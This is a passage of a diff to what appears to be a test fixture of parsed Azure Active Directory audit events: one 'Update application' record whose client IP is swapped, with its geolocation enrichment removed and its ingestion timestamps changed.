"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125282400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16046,25 +14660,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16078,7 +14674,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16192,7 +14788,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -16204,12 +14800,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036511Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125287500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16235,25 +14831,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": 